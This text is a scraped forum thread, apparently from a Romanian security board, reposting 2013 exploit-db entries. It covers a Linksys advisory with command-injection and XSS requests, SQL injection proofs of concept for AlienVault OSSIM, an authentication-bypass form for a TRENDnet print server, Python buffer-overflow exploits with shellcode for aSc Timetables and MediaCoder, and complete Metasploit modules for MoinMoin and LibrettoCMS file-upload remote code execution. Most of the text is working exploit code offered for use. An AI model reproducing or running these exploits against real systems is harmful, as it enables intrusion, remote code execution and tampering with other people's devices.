gzip, deflate Referer: http://192.168.178.188/User_Properties.asp Authorization: Basic XXX= Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 444 command=device_data&cur_ipaddr=192.168.178.188&next_page=StorageAdminUserAdd1.htm&redirect_timer=1&reboot=0&data1=&next_page=&submit_button=User_Properties&submit_type=create_user&change_action=gozila_cgi&Add_Account_Group_Name=&access_group_name=&delete_groups=&Modify_Account_Name=&Add_Account_Name=pwnd&full_name=pwnd&user_desc=pwnd&Add_Account_Password=`ping%20192%2e168%2e178%2e103`&Add_Account_PasswordConfirm=pwnd&Add_Account_Group=admin * For changing the password there is no request to the current password (3): With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser. * reflected XSS Injecting scripts into the following parameters reveals that these are not properly validated for malicious input. => Parameter: ping_ip (4) POST /apply.cgi HTTP/1.1 Host: 192.168.178.188 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.178.188/Diagnostics.asp Authorization: Basic XXX= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 156 submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=1.1.1.1'><script>alert(1)</script>&ping_size=32&ping_times=5&traceroute_ip= => Parameter: sortby (5) POST /apply.cgi HTTP/1.1 Host: 192.168.178.188 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.178.188/DHCPTable.asp Authorization: Basic XXX= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 103 submit_button=DHCPTable&change_action=&submit_type=&small_screen=&ip=&mac=&if_name=&nowait=1&sortby=mac"%3balert(1)// => Parameter: submit_button (6) POST /apply.cgi HTTP/1.1 Host: 192.168.178.188 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.178.188/WanMAC.asp Authorization: Basic XXX= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 106 submit_button=WanMAC'%3balert(1)//&change_action=&submit_type=&action=Apply&wait_time=3&mac_clone_enable=0 ============ Solution ============ Update to version "v1.0.05 build 002 Feb 21,2013" to fix the following findings: 1, 2, 4, 5, 6 ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de/advisories Twitter: @s3cur1ty_de ============ Time Line: ============ 28.01.2013 - discovered vulnerability 04.02.2013 - Reported vulnerability privately to vendor 22.02.2013 - Requested update 25.02.2013 - Linksys responded that there are no updates 18.03.2013 - Requested update => and some more update requests ... 08.05.2013 - Testing update from vendor 08.05.2013 - responded testing results 21.06.2013 - Linksys informed me about public available firmware update 22.06.2013 - public disclosure ===================== Advisory end =====================
  17. Matt
    Author : Glafkos Charalambous Source : Alienvault OSSIM Open Source SIEM 4.1 Multiple SQL Vulnerabilities Code : # Title: Alienvault OSSIM Open Source SIEM 4.1 Multiple SQL Vulnerabilities # Date: February 15, 2013 # Author: Glafkos Charalambous # Vendor: AlienVault # Vendor URL: http://www.alienvault.com # Reported: February 17, 2013 Timeline: --------- 17 Feb 2013: Vulnerability Reported to AlienVault 19 Feb 2013: Sales Department replied if interested to migrate from OSSIM to AlienVault 19 Feb 2013: Asked if there is someone that can handle the security issues 22 Feb 2013: No Vendor response 22 Jun 2013: Public Disclosure Vendor Description: ------------------- OSSIM is the most widely used SIEM offering, thanks in no small part to the open source community that has promoted its use. OSSIM provides all of the capabilities that a security professional needs from a SIEM offering, event collection, normalization, correlation and incident response - but it also does far more. Not simply satisfied with integrating data from existing security tools, OSSIM is built on the Unified Security Management platform which provides a common framework for the deployment, configuration, and management of your security tools. Vulnerability Details: ---------------------- Blind SQL Injection vulnerabilities detected in the Alienvault OSSIM Open Source SIEM 4.1 product: Example POC: Get Parameter: sensor https://[host]/ossim/forensics/base_qry_main.php?new=1&num_result_rows=-1&sensor=SQL_INJECTION&submit=Query Get Parameter: tcp_flags https://[host]/ossim/forensics/base_stat_alerts.php?ossim/forensics/base_stat_alerts.php?current_view=-1 &layer4=TCP&num_result_rows=-1&sort_order=occur_d&tcp_flags[0]=SQL_INJECTION&tcp_port[0][0]= &tcp_port[0][1]=layer4_sport&tcp_port[0][2]==&tcp_port[0][3]=16315 &tcp_port[0][4]= &tcp_port[0][5]= &tcp_port_cnt=1 Get Parameter: tcp_port https://[host]/ossim/forensics/base_stat_alerts.php?current_view=-1&layer4=TCP&num_result_rows=-1&sort_order=occur_d &tcp_flags[0]=&tcp_port[0][0]= &tcp_port[0][1]=layer4_sport&tcp_port[0][2]==&tcp_port[0][3]=16315 &tcp_port[0][4]=SQL_INJECTION&tcp_port[0][5]= &tcp_port_cnt=1 GetParameter: ip_addr https://[host]/ossim/forensics/base_stat_ports.php?ip_addr[0][0]= &ip_addr[0][1]=ip_src&ip_addr[0][2]== &ip_addr[0][3]=192.168.0.11&ip_addr[0][8]= &ip_addr[0][9]=AND&ip_addr[1][0]= &ip_addr[1][1]=ip_dst&ip_addr[1][2]== &ip_addr[1][3]=0.0.0.0&ip_addr[1][8]=SQL_INJECTION&ip_addr[1][9]= &ip_addr_cnt=2&port_type=2&proto=6 Get Parameter: port_type https://[host]/ossim/forensics/base_stat_ports.php?ip_addr[0][0]= &ip_addr[0][1]=ip_src&ip_addr[0][2]== &ip_addr[0][3]=0.0.0.0&ip_addr[0][8]= &ip_addr[0][9]=AND&ip_addr[1][0]= &ip_addr[1][1]=ip_dst&ip_addr[1][2]== &ip_addr[1][3]=0.0.0.0&ip_addr[1][8]= &ip_addr[1][9]= &ip_addr_cnt=2&port_type=SQL_INJECTION&proto=6 SQL Injection vulnerabilities detected in the Alienvault OSSIM Open Source SIEM 4.1 product: Example POC: Get Parameter: sortby https://[host]/ossim/vulnmeter/index.php?allres=1&op=search&rvalue=1&sortby=SQL_INJECTION&submit=Find&type=scantime&withoutmenu=1 Get Parameter: rvalue https://[host]/ossim/vulnmeter/index.php?allres=1&op=search&rvalue=SQL_INJECTION&sortby=&submit=Find&type=scantime&withoutmenu=1
  18. Matt
    Author : Chako Source : TRENDnet TE100-P1U Print Server Firmware 4.11 Authentication Bypass Vulnerability Code : ############################################################# # # Exploit Title: TRENDnet TE100-P1U Print Server Firmware 4.11 Authentication Bypass Vulnerability # Date: 2013/6/20 # Exploit Author: Chako # Firmware Version: 4.11 # Tested on: Windows 7 ############################################################# Description: ===================== A remote authentication bypass vulnerability affects TRENDnet TE100-P1U Print Server. This issue is due to a failure of the application to validate authentication credentials when processing print server configuration change requests. An attacker could reset print server to factory sttings or changeing its IP address without password security check. Exploit: ===================== 1)Reset Print Server To Factory Settings <form action="http://IP/Reply.htm" method="POST"> <table border="0" cellpadding="3" cellspacing="0" width="100%"> <tbody><tr><td class="headerbg">Factory Reset</td></tr> </tbody></table> <table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%"> <tbody><tr><td height="50" bgcolor="#F0F0F0"> <span class="bluetextbold">Do you want to restore Print Server to factory default setting?</span></td></tr> </tbody></table><br> <input name="Factory" value=" Yes " type="submit" width="60"> </form> 1)Change Print Server IP Address <form action="http://IP/Network.htm" method="POST"> <table border="0" cellpadding="3" cellspacing="0" width="100%"> <tbody><tr><td class="headerbg">Change IP Address</td></tr> </tbody></table> <table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%"> <tbody><tr> <td class="bluetextbold" align="right" bgcolor="#C5CEDA" valign="top" width="150"> IP Address:</td> <td bgcolor="#F0F0F0" valign="top"> <table border="0"> <tbody><tr><td> <input name="IP_ASSIGN" value="1" type="radio">Manually Assign <table border="0" cellpadding="3" cellspacing="0"> <tbody><tr> <td width="20"></td><td>IP Address</td> <td>: <input size="18" name="IP_Address" value="192.168.1.110" type="text"></td> </tr> <tr> <td></td><td>Subnet Mask</td> <td>: <input size="18" name="Subnet_Mask" value="255.255.255.0" type="text"></td> </tr> <tr> <td></td><td>Default Gateway</td> <td>: <input size="18" name="Default_Gateway" value="192.168.1.254" type="text"></td> </tr> </tbody></table> </td></tr> </tbody></table> </td> </tr> </tbody></table> <table border="0" cellpadding="5" cellspacing="1" width="100%"> <tbody><tr> <td height="50" width="149"> </td> <td width="355"> <input name="Config2" value=" Save " type="submit" width="80"> <input value="Cancel" type="reset" width="80"></td> </tr> </tbody></table> </form>
  19. Matt
    Author : Dark-Puzzle Source : aSc Timetables 2013 - Stack Buffer Overflow Vulnerability Code : #!/usr/bin/python # Title : ASC Timetables 2013 - Stack Buffer Overflow Vulnerability # Researcher : Souhail Hammou (Dark-Puzzle) # Research Team : http://itsecurity.ma # Facebook : http://www.facebook.com/dark.puzzle.sec # Date : 22/06/2013 # Download Website : www.asctimetables.com/download_en.html ########################################################## # Software Details : # ASC timetables is a school scheduling software used widely by many schools around the globe to generate unique timetables for students. # it has the features to add school subjects , teachers and manipulate time. # Vulnerability details : # The buffer overflow vulnerability resides in the Add subject functionality, and it's triggered when the user will submit a large string when specifying the #school subject name. To trigger the vulnerability go to the main menu , select subjects , click new then generate a string with the code below and the #software will execute the shellcode which will popup a MessageBox. # Picture : http://oi40.tinypic.com/30rwc2q.jpg garbage = "D"*512 eip = "\xCB\xC0\x8F\x75" #JMP ESP from kernel32.dll nopsled = "\x90"*177 shellcode = "\xB8\x23\x58\xA7\x11\x2D\x11\x11\x11\x11\x6A\x14\x50\x50\x33\xC0\x50\xB8\x98\x34\x69\x11\x2D\x11\x11\x11\x11\xFF\xE0" # I have written this shellcode which will popup a "Yes/No" MessageBox with Title and Message : iteDump #MOV EAX,11A75823 #SUB EAX,11111111 #PUSH 14 #PUSH EAX #PUSH EAX #XOR EAX,EAX #PUSH EAX #MOV EAX,11693498 #SUB EAX,11111111 #JMP EAX ToInsert = open("file.txt", "w") ToInsert.write(garbage+eip+nopsled+shellcode) ToInsert.close()
  20. Matt
    Author : metacom Source : MediaCoder PMP Edition 0.8.17 (.m3u) - Buffer Overflow Exploit Code : print """ [+]Exploit Title: MediaCoder PMP Edition 0.8.17 Buffer Overflow Exploit (SEH) [+]Download link: http://www.mediacoderhq.com/device/mpx.htm [+]Vulnerable Product: MediaCoder (Personal Media Player) Edition [+]Date (found): 21.06.2013 [+]Date (publish): 21.06.2013 [+]Founder: metacom [+]RST [+]Tested on: Windows Xp pro-sp3 English """ from struct import pack junk = "http://" + "\x41" * 765 nseh = "\xeb\x06\x90\x90" seh = pack('<I',0x66D81575)#66D81575 5F POP EDI avutil-52.dll nops= "\x90" * 80 #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t c shell=("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" "\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e" "\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10" "\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7" "\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5" "\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97" "\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f" "\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd" "\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2" "\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04" "\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3" "\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d" "\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e" "\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4" "\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f" "\xaa\x4d") exploit = junk + nseh + seh + nops + shell try: rst= open("mediacoder-pmp.m3u",'w') rst.write(exploit) rst.close() raw_input("\nExploit file created!\n") except: print "Error"
  21. Matt
    Author : metacom Source : Mediacoder (.m3u) - SEH Buffer Overflow Code : #!/usr/bin/python import os import sys from struct import pack from time import sleep if os.name == "nt": os.system("cls") os.system("color 3f") else: os.system("clear") print """ [+]Exploit Title: All Mediacoder Product SEH Buffer Overflow [+]Download All Product: http://www.mediacoderhq.com/editions.html [+]Vulnerable Product:! [+]Mediacoder 0.8.22.5525 [+]Mediacoder Web Video Edition 0.8.22 [+]Mediacoder Handsets Edition 0.8.22 [+]Mediacoder iPhone Edition 0.8.22 [+]MediaCoder-PSP Edition 0.8.22 [+]Vulnerabilities File Format:m3u [+]Date (found): 21.06.2013 [+]Date (publish): 21.06.2013 [+]Founder: metacom [+]RST [+]Tested on: Windows Xp pro-sp3 English """ buffer = "http://" + "\x41" * 845 nseh = "\xEB\x06\xFF\xFF" seh= pack('<I',0x66012E63)# 66012E63 POP EBX libiconv-2.dll nops= "\x90" * 80 #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t c shell= ("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" "\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e" "\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10" "\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7" "\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5" "\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97" "\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f" "\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd" "\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2" "\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04" "\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3" "\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d" "\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e" "\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4" "\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f" "\xaa\x4d") exploit = buffer + nseh + seh + nops + shell try: rst= open("All-MediaCoder.m3u",'w') rst.write(exploit) rst.close() raw_input("\nExploit file created!\n") except: print "Error"
  22. Matt
    Author : metacom Source : Mediacoder (.lst) - SEH Buffer Overflow Code : #!/usr/bin/python import os import sys from struct import pack from time import sleep if os.name == "nt": os.system("cls") os.system("color 3f") else: os.system("clear") print """ [+]Exploit Title: All Mediacoder Product SEH Buffer Overflow [+]Download All Product: http://www.mediacoderhq.com/editions.html [+]Vulnerable Product:! [+]Mediacoder 0.8.22.5525 [+]Mediacoder Web Video Edition 0.8.22 [+]Mediacoder Handsets Edition 0.8.22 [+]Mediacoder iPhone Edition 0.8.22 [+]MediaCoder-PSP Edition 0.8.22 [+]Vulnerabilities File Format:lst [+]Date (found): 21.06.2013 [+]Date (publish): 21.06.2013 [+]Founder: metacom [+]RST [+]Tested on: Windows Xp pro-sp3 English """ buffer = "http://" + "\x41" * 845 nseh = "\xEB\x06\xFF\xFF" seh= pack('<I',0x66012E63)# 66012E63 POP EBX libiconv-2.dll nops= "\x90" * 80 #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t c shell= ("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1" "\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e" "\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10" "\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7" "\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5" "\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97" "\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f" "\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd" "\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2" "\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04" "\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3" "\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d" "\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e" "\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4" "\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f" "\xaa\x4d") exploit = buffer + nseh + seh + nops + shell try: rst= open("All-MediaCoder.lst",'w') rst.write(exploit) rst.close() raw_input("\nExploit file created!\n") except: print "Error"
  23. Matt

    A venit timpul

    Matt replied to io.kent's topic in Sugestii

    Mai bine s-ar inchide topicul , nu se va ajunge nicaieri cu el.Se va umple de troll si flame.
  24. Matt
    Author : Metasploit Source : MoinMoin twikidraw Action Traversal File Upload Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/adfa15e3e37cf26b4b014f209959e9d9-moin-1.9.5.tar.gz Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'MoinMoin twikidraw Action Traversal File Upload', 'Description' => %q{ This module exploits a vulnerability in MoinMoin 1.9.5. The vulnerability exists on the manage of the twikidraw actions, where a traversal path can be used in order to upload arbitrary files. Exploitation is achieved on Apached/mod_wsgi configurations by overwriting moin.wsgi, which allows to execute arbitrary python code, as exploited in the wild on July, 2012. The user is warned to use this module at his own risk since it's going to overwrite the moin.wsgi file, required for the correct working of the MoinMoin wiki. While the exploit will try to restore the attacked application at post exploitation, correct working after all isn't granted. }, 'Author' => [ 'Unknown', # Vulnerability discovery 'HTP', # PoC 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-6081' ], [ 'OSVDB', '88825' ], [ 'BID', '57082' ], [ 'EDB', '25304' ], [ 'URL', 'http://hg.moinmo.in/moin/1.9/rev/7e7e1cbb9d3f' ], [ 'URL', 'http://wiki.python.org/moin/WikiAttack2013' ] ], 'Privileged' => false, # web server context 'Payload' => { 'DisableNops' => true, 'Space' => 16384, # Enough one to fit any payload 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet netcat perl' } }, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Targets' => [[ 'MoinMoin 1.9.5', { }]], 'DisclosureDate' => 'Dec 30 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "MoinMoin base path", "/" ]), OptString.new('WritablePage', [ true, "MoinMoin Page with edit permissions to inject the payload, by default WikiSandbox (Ex: /WikiSandbox)", "/WikiSandBox" ]), OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]), OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ]) ], self.class) end def moinmoin_template(path) template =[] template << "# -*- coding: iso-8859-1 -*-" template << "import sys, os" template << "sys.path.insert(0, 'PATH')".gsub(/PATH/, File.dirname(path)) template << "from MoinMoin.web.serving import make_application" template << "application = make_application(shared=True)" return template end def restore_file(session, file, contents) first = true contents.each {|line| if first session.shell_command_token("echo \"#{line}\" > #{file}") first = false else session.shell_command_token("echo \"#{line}\" >> #{file}") end } end # Try to restore a basic moin.wsgi file with the hope of making the # application usable again. # Try to search on /usr/local/share/moin (default search path) and the # current path (apache user home). Avoiding to search on "/" because it # could took long time to finish. def on_new_session(session) print_status("Trying to restore moin.wsgi...") begin files = session.shell_command_token("find `pwd` -name moin.wsgi 2> /dev/null") files.split.each { |file| print_status("#{file} found! Trying to restore...") restore_file(session, file, moinmoin_template(file)) } files = session.shell_command_token("find /usr/local/share/moin -name moin.wsgi 2> /dev/null") files.split.each { |file| print_status("#{file} found! Trying to restore...") restore_file(session, file, moinmoin_template(file)) } print_warning("Finished. If application isn't usable, manual restore of the moin.wsgi file would be required.") rescue print_warning("Error while restring moin.wsgi, manual restoring would be required.") end end def do_login(username, password) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(@base, @page), 'vars_post' => { 'action' => 'login', 'name' => username, 'password' => password, 'login' => 'Login' } }) if not res or res.code != 200 or not res.headers.include?('Set-Cookie') return nil end return res.get_cookies end def upload_code(session, code) vprint_status("Retrieving the ticket...") res = send_request_cgi({ 'uri' => normalize_uri(@base, @page), 'cookie' => session, 'vars_get' => { 'action' => 'twikidraw', 'do' => 'modify', 'target' => '../../../../moin.wsgi' } }) if not res or res.code != 200 or res.body !~ /ticket=(.*?)&target/ vprint_error("Error retrieving the ticket") return nil end ticket = $1 vprint_good("Ticket found: #{ticket}") my_payload = "[MARK]#{code}[MARK]" post_data = Rex::MIME::Message.new post_data.add_part("drawing.r if()else[]\nexec eval(\"open(__file__)\\56read()\\56split('[MARK]')[-2]\\56strip('\\\\0')\")", nil, nil, "form-data; name=\"filename\"") post_data.add_part(my_payload, "image/png", nil, "form-data; name=\"filepath\"; filename=\"drawing.png\"") my_data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(@base, @page), 'cookie' => session, 'vars_get' => { 'action' => 'twikidraw', 'do' => 'save', 'ticket' => ticket, 'target' => '../../../../moin.wsgi' }, 'data' => my_data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) if not res or res.code != 200 or not res.body.empty? vprint_error("Error uploading the payload") return nil end return true end def check @base = target_uri.path @base << '/' if @base[-1, 1] != '/' res = send_request_cgi({ 'uri' => normalize_uri(@base) }) if res and res.code == 200 and res.body =~ /moinmoin/i and res.headers['Server'] =~ /Apache/ return Exploit::CheckCode::Detected elsif res return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe end def writable_page?(session) res = send_request_cgi({ 'uri' => normalize_uri(@base, @page), 'cookie' => session, }) if not res or res.code != 200 or res.body !~ /Edit \(Text\)/ return false end return true end def exploit # Init variables @page = datastore['WritablePage'] @base = target_uri.path @base << '/' if @base[-1, 1] != '/' # Login if needed if (datastore['USERNAME'] and not datastore['USERNAME'].empty? and datastore['PASSWORD'] and not datastore['PASSWORD'].empty?) print_status("Trying login to get session ID...") session = do_login(datastore['USERNAME'], datastore['PASSWORD']) else print_status("Using anonymous access...") session = "" end # Check authentication if not session fail_with(Exploit::Failure::NoAccess, "Error getting a session ID, check credentials or WritablePage option") end # Check writable permissions if not writable_page?(session) fail_with(Exploit::Failure::NoAccess, "There are no write permissions on #{@page}") end # Upload payload print_status("Trying to upload payload...") python_cmd = "import os\nos.system(\"#{Rex::Text.encode_base64(payload.encoded)}\".decode(\"base64\"))" res = upload_code(session, "exec('#{Rex::Text.encode_base64(python_cmd)}'.decode('base64'))") if not res fail_with(Exploit::Failure::Unknown, "Error uploading the payload") end # Execute payload print_status("Executing the payload...") res = send_request_cgi({ 'uri' => normalize_uri(@base, @page), 'cookie' => session, 'vars_get' => { 'action' => 'AttachFile' } }, 5) end end
  25. Matt
    Author : Metasploit Source : LibrettoCMS File Manager Arbitary File Upload Vulnerability Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/3a6192ec846b3cb66f62e7c998442bf4-librettoCMS_v.2.2.2.zip Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE def initialize(info={}) super(update_info(info, 'Name' => "LibrettoCMS File Manager Arbitary File Upload Vulnerability", 'Description' => %q{ This module exploits a file upload vulnerability found in LibrettoCMS 1.1.7, and possibly prior. Attackers bypass the file extension check and abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitary remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'CWH', 'sinn3r' #Metasploit ], 'References' => [ ['OSVDB', '94391'], ['EDB', '26213'] ], 'Payload' => { 'BadChars' => "\x00" }, 'Platform' => ['linux', 'php'], 'Targets' => [ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ] ], 'Privileged' => false, 'DisclosureDate' => "Jun 14 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to LibrettoCMS', '/librettoCMS_v.2.2.2/']) ], self.class) end def peer "#{rhost}:#{rport}" end def check res = send_request_raw({'uri' => normalize_uri(target_uri.path)}) if not res print_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown end if res.body =~ /Powered by <a href=".+">Libretto CMS/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def upload(base) p = get_write_exec_payload(:unlink_self=>true) fname = "#{Rex::Text.rand_text_alpha(6)}.pdf" data = Rex::MIME::Message.new data.add_part(fname, nil, nil, "form-data; name=\"Filename\"") data.add_part(p, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{fname}\"") data.add_part('Submit Query', nil, nil, 'form-data; name="Upload"') post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'upload.php') res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'vars_get' => {'type'=>'all files'} }) if not res fail_with(Exploit::Failure::Unknown, "#{peer} - Request timed out while uploading") elsif res.code.to_i != 200 fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Unknown reply: #{res.code.to_s}") end fname end def rename(base, original_fname) new_name = "#{Rex::Text.rand_text_alpha(5)}.pdf.php" uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'files.php') res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_get' => { 'type' => 'all files' }, 'vars_post' => { 'fun' => 'renameFile', 'dir' => '', 'filename' => original_fname, 'newFilename' => new_name } }) if not res fail_with(Exploit::Failure::Unknown, "#{peer} - Request timed out while renaming") elsif res.body !~ /"res":"OK"/ fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to rename file") end new_name end def exec(base, payload_fname) res = send_request_cgi({ 'uri' => normalize_uri(base, 'userfiles', payload_fname) }) if res and res.code.to_i == 404 fail_with(Exploit::Failure::NotFound, "#{peer} - Not found: #{payload_fname}") end end def exploit base = target_uri.path print_status("#{peer} - Uploading malicious file...") orig_fname = upload(base) print_status("#{peer} - Renaming #{orig_fname}...") new_fname = rename(base, orig_fname) print_status("#{peer} - Executing #{new_fname}...") exec(base, new_fname) end end
×
×
  • Create New...